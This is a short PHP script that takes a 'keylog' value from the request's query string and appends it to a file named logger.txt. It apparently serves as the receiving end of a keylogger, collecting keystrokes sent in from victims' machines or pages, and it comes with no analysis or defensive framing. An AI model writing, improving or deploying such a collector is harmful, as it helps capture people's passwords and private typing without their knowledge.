<?php
    $recived_keys = $HTTP_GET_VARS["keylog"];
	
    $file = fopen('logger.txt', 'a');
	
    fwrite($file, $recived_keys . "\n");
?>

